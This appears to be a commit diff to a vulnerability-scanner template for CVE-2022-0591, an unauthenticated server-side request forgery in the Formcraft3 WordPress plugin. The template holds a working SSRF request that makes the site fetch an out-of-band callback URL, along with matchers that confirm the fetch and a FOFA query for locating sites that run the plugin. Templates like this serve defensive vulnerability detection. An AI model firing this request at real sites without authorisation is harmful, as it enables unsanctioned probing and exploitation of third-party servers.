commit
7e8f939eed
|
@ -2,9 +2,10 @@ id: CVE-2022-0591
|
|||
|
||||
info:
|
||||
name: Formcraft3 <3.8.28 - Server-Side Request Forgery
|
||||
author: Akincibor
|
||||
author: Akincibor,j4vaovo
|
||||
severity: critical
|
||||
description: Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
|
||||
description: |
|
||||
Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0591
|
||||
|
@ -18,6 +19,8 @@ info:
|
|||
epss-percentile: 0.77706
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: body="formcraft3" && body="wp-"
|
||||
framework: wordpress
|
||||
vendor: subtlewebinc
|
||||
product: formcraft3
|
||||
|
@ -28,8 +31,14 @@ http:
|
|||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: WordPress"
|
||||
|
|
Loading…
Reference in New Issue